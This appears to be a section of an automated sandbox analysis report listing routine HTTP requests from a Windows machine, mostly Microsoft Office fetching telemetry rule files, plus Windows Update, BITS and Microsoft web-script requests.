              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGZxU9wu8Nf8x8+&MD=5Ek2bgCM HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
